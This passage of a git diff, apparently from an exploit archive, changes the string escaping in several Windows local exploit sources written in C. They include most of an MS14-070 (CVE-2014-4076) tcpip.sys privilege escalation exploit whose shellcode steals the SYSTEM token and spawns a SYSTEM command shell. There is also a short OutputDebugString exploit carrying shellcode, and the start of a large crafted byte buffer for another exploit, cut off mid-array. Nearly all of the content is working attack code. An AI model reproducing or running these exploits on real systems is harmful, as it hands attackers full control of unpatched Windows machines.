+                NULL,                                                           // Use parent's starting directory
                 &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                 &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
         );
@@ -160,14 +160,14 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
         returnAllocMemValue1 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x28,
-                \"\\x87\\xff\\xff\\x38\",
+                "\x87\xff\xff\x38",
                 4,
                 NULL
         );
         returnAllocMemValue2 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x38,
-                \"\\x00\\x00\",
+                "\x00\x00",
                 2,
                 NULL
         );
@@ -181,7 +181,7 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
         returnAllocMemValue4 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x2b,
-                \"\\x00\\x00\",
+                "\x00\x00",
                 2,
                 NULL
         );
@@ -208,8 +208,8 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
 
 int main (void)
 {
-        fprintf (stderr, \"[*] MS14-070 (CVE-2014-4076) x86\\n\");
-        fprintf (stderr, \"    [*] by Tomislav Paskalev\\n\");
+        fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
+        fprintf (stderr, "    [*] by Tomislav Paskalev\n");
         fflush (stderr);
 
 
@@ -222,13 +222,13 @@ int main (void)
 
         if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
         {
-                fprintf (stderr, \"[-] Creating a new process failed\\n\");
-                fprintf (stderr, \"    [*] Error code   : %d\\n\", GetLastError());
+                fprintf (stderr, "[-] Creating a new process failed\n");
+                fprintf (stderr, "    [*] Error code   : %d\n", GetLastError());
                 fflush (stderr);
                 ExitProcess (1);
         }
 
-        fprintf (stderr, \"[+] Created a new cmd.exe process\\n\");
+        fprintf (stderr, "[+] Created a new cmd.exe process\n");
         fflush (stderr);
 
 
@@ -237,14 +237,14 @@ int main (void)
         ////////////////////////////////
 
         unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, \"    [*] PID [dec]    :   %#8lu\\n\", (unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, \"    [*] PID [hex]    : %#010x\\n\", (unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, \"    [*] PID [hex LE] : %#010x\\n\", pidLittleEndian);
+        fprintf (stderr, "    [*] PID [dec]    :   %#8lu\n", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, "    [*] PID [hex]    : %#010x\n", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, "    [*] PID [hex LE] : %#010x\n", pidLittleEndian);
 
         /*four bytes of hex = 8 characters, plus NULL terminator*/
         unsigned char pidLittleEndianString[9];
 
-        sprintf (&pidLittleEndianString[0], \"%04x\", pidLittleEndian);
+        sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);
 
 
         ////////////////////////////////
@@ -252,15 +252,15 @@ int main (void)
         ////////////////////////////////
 
         unsigned char exploitBuffer[] =
-        \"\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\"
-        \"\\x22\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\";
+        "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
+        "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
         unsigned char shellcode[] =
-        \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\\x8B\\x40\\x38\\x50\\xBB\\x04\\x00\\x00\\x00\"
-        \"\\x8B\\x80\\x98\\x00\\x00\\x00\\x2D\\x98\\x00\\x00\\x00\\x39\\x98\\x94\\x00\\x00\"
-        \"\\x00\\x75\\xED\\x8B\\xB8\\xD8\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\\x41\\x41\"
-        \"\\x41\\x41\\x8B\\x80\\x98\\x00\\x00\\x00\\x2D\\x98\\x00\\x00\\x00\\x39\\x98\\x94\"
-        \"\\x00\\x00\\x00\\x75\\xED\\x89\\xB8\\xD8\\x00\\x00\\x00\\x61\\xBA\\x11\\x11\\x11\"
-        \"\\x11\\xB9\\x22\\x22\\x22\\x22\\xB8\\x3B\\x00\\x00\\x00\\x8E\\xE0\\x0F\\x35\\x00\";
+        "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
+        "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
+        "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
+        "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
+        "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
+        "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
 
         int counter;
         for (counter = 0; counter < 4; counter++)
@@ -269,17 +269,17 @@ int main (void)
                 shellcode[46 + counter] = strtol (buffer, NULL, 16);
         }
 
-        shellcode[77] = strtol (\"39\", NULL, 16);
-        shellcode[78] = strtol (\"ff\", NULL, 16);
-        shellcode[79] = strtol (\"a2\", NULL, 16);
-        shellcode[80] = strtol (\"ba\", NULL, 16);
+        shellcode[77] = strtol ("39", NULL, 16);
+        shellcode[78] = strtol ("ff", NULL, 16);
+        shellcode[79] = strtol ("a2", NULL, 16);
+        shellcode[80] = strtol ("ba", NULL, 16);
 
-        shellcode[82] = strtol (\"0\", NULL, 16);
-        shellcode[83] = strtol (\"0\", NULL, 16);
-        shellcode[84] = strtol (\"0\", NULL, 16);
-        shellcode[85] = strtol (\"0\", NULL, 16);
+        shellcode[82] = strtol ("0", NULL, 16);
+        shellcode[83] = strtol ("0", NULL, 16);
+        shellcode[84] = strtol ("0", NULL, 16);
+        shellcode[85] = strtol ("0", NULL, 16);
 
-        fprintf (stderr, \"[+] Modified shellcode\\n\");
+        fprintf (stderr, "[+] Modified shellcode\n");
         fflush (stderr);
 
 
@@ -288,7 +288,7 @@ int main (void)
         ////////////////////////////////
 
         HANDLE tcpIPDeviceHandle = CreateFileA (
-                \"\\\\\\\\.\\\\Tcp\",
+                "\\\\.\\Tcp",
                 0,
                 0,
                 NULL,
@@ -299,12 +299,12 @@ int main (void)
 
         if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
         {
-                printf (\"[-] Opening TCP/IP I/O dev failed\\n\");
-                printf (\"    [*] Error code   : %d\\n\", GetLastError());
+                printf ("[-] Opening TCP/IP I/O dev failed\n");
+                printf ("    [*] Error code   : %d\n", GetLastError());
                 ExitProcess (1);
         }
 
-        fprintf (stderr, \"[+] Opened TCP/IP I/O device\\n\");
+        fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
         fflush (stderr);
 
 
@@ -314,9 +314,9 @@ int main (void)
 
         FARPROC ZwAllocateVirtualMemory;
 
-        ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle (\"NTDLL.DLL\"), \"ZwAllocateVirtualMemory\");
+        ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
 
-        fprintf (stderr, \"[*] ntdll.dll address: 0x%p\\n\", ZwAllocateVirtualMemory);
+        fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
         fflush (stderr);
 
         NTSTATUS AllocMemReturnCode;
@@ -333,14 +333,14 @@ int main (void)
 
         if (AllocMemReturnCode != 0)
         {
-                printf (\"[-] Allocating memory failed\\n\");
-                printf (\"    [*] Error code   : %#X\\n\", AllocMemReturnCode);
+                printf ("[-] Allocating memory failed\n");
+                printf ("    [*] Error code   : %#X\n", AllocMemReturnCode);
                 ExitProcess (1);
         }
 
-        fprintf (stderr, \"[+] Allocated memory\\n\");
-        fprintf (stderr, \"    [*] BaseAddress  : 0x%p\\n\", BaseAddress);
-        fprintf (stderr, \"    [*] RegionSize   : %#010x\\n\", RegionSize);
+        fprintf (stderr, "[+] Allocated memory\n");
+        fprintf (stderr, "    [*] BaseAddress  : 0x%p\n", BaseAddress);
+        fprintf (stderr, "    [*] RegionSize   : %#010x\n", RegionSize);
         fflush (stderr);
 
 
@@ -348,19 +348,19 @@ int main (void)
         // WRITE EXPLOIT TO PROCESS MEM
         ////////////////////////////////
 
-        fprintf (stderr, \"[*] Writing exploit...\\n\");
+        fprintf (stderr, "[*] Writing exploit...\n");
         fflush (stderr);
 
         if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
         {
-                fprintf (stderr, \"    [-] Failed to write to memory\\n\");
-                fprintf (stderr, \"        [*] Err code : %d\\n\", GetLastError ());
+                fprintf (stderr, "    [-] Failed to write to memory\n");
+                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
                 fflush (stderr);
                 ExitProcess (1);
         }
         else
         {
-                fprintf (stderr, \"    [+] done\\n\");
+                fprintf (stderr, "    [+] done\n");
                 fflush (stderr);
         }
 
@@ -369,15 +369,15 @@ int main (void)
         // SEND EXPLOIT TO TCPIP.SYS
         ////////////////////////////////
 
-        fprintf (stderr, \"[*] Spawning SYSTEM shell...\\n\");
-        fprintf (stderr, \"    [*] Parent proc hangs on exit\\n\");
+        fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
+        fprintf (stderr, "    [*] Parent proc hangs on exit\n");
         fflush (stderr);
 
         FARPROC ZwDeviceIoControlFile;
         NTSTATUS DevIoCtrlReturnCode;
         ULONG ioStatus = 8;
 
-        ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle (\"NTDLL.DLL\"), \"ZwDeviceIoControlFile\");
+        ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
 
         DevIoCtrlReturnCode = ZwDeviceIoControlFile (
                 tcpIPDeviceHandle,
@@ -397,8 +397,8 @@ int main (void)
 
         if (DevIoCtrlReturnCode != 0)
         {
-                fprintf (stderr, \"    [-] Exploit failed (->TCP/IP)\\n\");
-                fprintf (stderr, \"        [*] Err code : %d\\n\", GetLastError ());
+                fprintf (stderr, "    [-] Exploit failed (->TCP/IP)\n");
+                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
                 fflush (stderr);
                 ExitProcess (1);
         }
@@ -411,7 +411,7 @@ int main (void)
         // Wait until child process exits.
         WaitForSingleObject (processInformation->hProcess, INFINITE);
 
-        fprintf (stderr, \"[*] Exiting SYSTEM shell...\\n\");
+        fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
         fflush (stderr);
 
         // Close process and thread handles.
diff --git a/platforms/windows/local/388.c b/platforms/windows/local/388.c
index 2d1357a53..4b52313d2 100755
--- a/platforms/windows/local/388.c
+++ b/platforms/windows/local/388.c
@@ -7,15 +7,15 @@
 #include 
 #include 
 
-#pragma comment(lib,\"kernel32.lib\")
+#pragma comment(lib,"kernel32.lib")
 
 void main(){
         unsigned char buffer[] =
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\
-\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\
-\\x90\\x90\\x90\\x90\\xEB\\x0F\\x58\\x80\\x30\\x99\\x40\\x81\\x38\\x54\\x55\\x52\\x4B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\\
-\\x12\\x75\\xCC\\x12\\x75\\xF1\\xFC\\xE1\\xFC\\xB9\\xF1\\xFA\\xF4\\xFD\\xB7\\x14\\xDC\\x61\\xC9\\x21\\x26\\x17\\x98\\xE1\\x66\\x49\\
-\\x54\\x55\\x52\\x4B\\xCD%.1423x\\x3E\\x02\\x4B\\x02\";
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
+\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
+\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\x99\x40\x81\x38\x54\x55\x52\x4B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\
+\x12\x75\xCC\x12\x75\xF1\xFC\xE1\xFC\xB9\xF1\xFA\xF4\xFD\xB7\x14\xDC\x61\xC9\x21\x26\x17\x98\xE1\x66\x49\
+\x54\x55\x52\x4B\xCD%.1423x\x3E\x02\x4B\x02";
 
         OutputDebugString(buffer);
 }
diff --git a/platforms/windows/local/3888.c b/platforms/windows/local/3888.c
index 03a1e7b50..cbef57e4e 100755
--- a/platforms/windows/local/3888.c
+++ b/platforms/windows/local/3888.c
@@ -14,282 +14,282 @@
 #include 
 
 char RAS[]=
-\"\\x59\\xa6\\x6a\\x95\\x00\\x00\\x01\\xfd\\x00\\x00\\x01\\xb6\\x00\\x00\\x00\\x08\"
-\"\\x00\\x03\\x68\\x94\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03\\x29\"
-\"\\x1b\\xff\\xbc\\xef\\x73\\xd9\\x13\\x00\\x70\\xf0\\xcc\\x8d\\x99\\x50\\xf1\\xf7\"
-\"\\xac\\x4d\\xf0\\xab\\xe0\\xec\\xef\\x2e\\xe5\\x8c\\xef\\xa6\\x33\\x8c\\xc6\\xfa\"
-\"\\xfe\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x1b\\xff\\xd7\\x64\\x8b\\x7c\\x41\\x84\\x00\\x2d\\x00\\xd0\\x99\\x94\\xe9\\xad\"
-\"\\xb4\\x4b\\xc9\\x85\\xe9\\xe5\\xb4\\x80\\x98\\x8c\\xe0\\xc4\\x33\\xb6\\xd5\\xf7\"
-\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x19\\xff\\xea\\x2e\\xd2\\xd9\\xb6\\xb4\\x00\\x6c\\xcc\\xe6\\x99\\xc5\\xe6\\x32\"
-\"\\xb4\\x51\\x90\\x90\\x24\\x00\\x00\\x00\\x3a\\x8c\\xd3\\xd9\\x33\\xd5\\xdd\\xf3\"
-\"\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x7b\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\xeb\\x10\\x81\\x90\"
-\"\\x8b\\xf8\\x00\\x0d\\xff\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x4e\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x22\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\xd5\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
-\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
